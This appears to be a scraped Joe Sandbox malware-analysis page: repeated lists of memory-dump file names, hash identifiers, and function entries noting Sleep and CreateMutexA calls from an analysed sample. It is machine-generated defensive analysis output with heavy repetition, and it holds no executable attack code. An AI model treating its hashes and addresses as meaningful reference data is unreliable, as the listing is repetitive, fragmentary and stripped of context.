Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: e1ec6dd2a3c786a36e4227953c4ef0e6f46bbce4293f1e8509c29a0f1ca58745
Instruction ID: 295bd9c24f82ff48b332bb7ee359519db3f87875b3a8646c9c00e7ded38ffe5d
Opcode Fuzzy Hash: e1ec6dd2a3c786a36e4227953c4ef0e6f46bbce4293f1e8509c29a0f1ca58745
Instruction Fuzzy Hash: 0F3129317042049BFF18AB78DC897ADB762AB87314F24861EE094D7BD1C77999808752

Function 0008A1AE Relevance: 3.1, APIs: 2, Instructions: 135
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: f6c4c0312737a374a1b236bb2e93f6b11ca335c2fb632c64f4479aff0486f01a
Instruction ID: 36ba92228102c010f2f32f1a8db21656009ead17bb4e5307d6f567908d42089c
Opcode Fuzzy Hash: f6c4c0312737a374a1b236bb2e93f6b11ca335c2fb632c64f4479aff0486f01a
Instruction Fuzzy Hash: E03115317042449BFF18AB6CDC89BADB762BB87310F24861EE094DB7D1C77A99808752

Function 0008A418 Relevance: 3.1, APIs: 2, Instructions: 133
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d39f9e587d3d7e3c782badfe679c0533e78985f554968d16e9661dfcb8ecadc8
Instruction ID: ad8f103e4cd3e8d12edecb2b4d6d0cefbe964d87bbdc0480928386284de40d1a
Opcode Fuzzy Hash: d39f9e587d3d7e3c782badfe679c0533e78985f554968d16e9661dfcb8ecadc8
Instruction Fuzzy Hash: 12312A317041049BFF18BB78DC897ADB661BBC3314F20461AE094977D6C7B599808752

Function 0008A54D Relevance: 3.1, APIs: 2, Instructions: 132
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: d98369f07db15021d2edadc9ac6476957cbf18f119e9c0268c75bef5a90f4d07
Instruction ID: ceb19a8c488bf9ea51a3bd06da6f2170451a4606ad60f865fc254880d965e926
Opcode Fuzzy Hash: d98369f07db15021d2edadc9ac6476957cbf18f119e9c0268c75bef5a90f4d07
Instruction Fuzzy Hash: 8B3139317052049BFB08BB78DC897ADBB62BB87314F24861EE084DB7D6C77999809712

Function 0008A682 Relevance: 3.1, APIs: 2, Instructions: 131
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

API ID: CreateMutexSleep
String ID:
API String ID: 1464230837-0
Opcode ID: 996e52bbe57079f7ffc619960c059581adb8ba9cb72e63a4abac57ac2e29bdad
Instruction ID: 9ad040bdd67a936a49614e005f619841c19e497a95ff9d9bdda55595cde1aedb
Opcode Fuzzy Hash: 996e52bbe57079f7ffc619960c059581adb8ba9cb72e63a4abac57ac2e29bdad
Instruction Fuzzy Hash: D6314A317042049BFB08BB7CDC897ADBB62FB87310F24861EE094E76D6C77599809752

Function 00089ADC Relevance: 3.1, APIs: 2, Instructions: 107
sleepsynchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNELBASE(00000064), ref: 0008A963
CreateMutexA.KERNELBASE(00000000,00000000,000E3254), ref: 0008A981

Memory Dump Source

Source File: 00000038.00000002.2578804574.0000000000081000.00000040.00000001.01000000.00000015.sdmp, Offset: 00080000, based on PE: true

Associated: 00000038.00000002.2578713082.0000000000080000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2578804574.00000000000E2000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579181371.00000000000E9000.00000004.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579236948.00000000000EB000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579316647.00000000000F5000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579404793.00000000000F6000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2579911453.00000000000F7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580594880.000000000024C000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2580701326.000000000024E000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2582278305.0000000000267000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583070146.0000000000269000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.000000000026A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2583490087.0000000000271000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2589832578.00000000002A6000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590037425.00000000002A7000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590207477.00000000002AD000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590383058.00000000002BA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590537505.00000000002CE000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590817327.00000000002D4000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2590969860.00000000002DB000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591234093.00000000002E0000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591350471.00000000002E7000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591509037.00000000002EA000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591612653.00000000002F4000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2591702583.00000000002F9000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592112554.0000000000300000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592152218.0000000000305000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592287787.0000000000306000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592333678.0000000000308000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592536807.0000000000309000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592657286.0000000000311000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592703067.0000000000321000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592744311.0000000000322000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592891636.000000000032D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000032E000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2592946349.000000000034A000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593443476.000000000037D000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2593703294.000000000037F000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594172042.0000000000380000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2594711040.0000000000383000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595108065.0000000000385000.00000080.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2595921887.0000000000393000.00000040.00000001.01000000.00000015.sdmpDownload File
Associated: 00000038.00000002.2596151555.0000000000395000.00000080.00000001.01000000.00000015.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_56_2_80000_483d2fa8a0d53818306efeb32d3.jbxd

Yara matches

Similarity

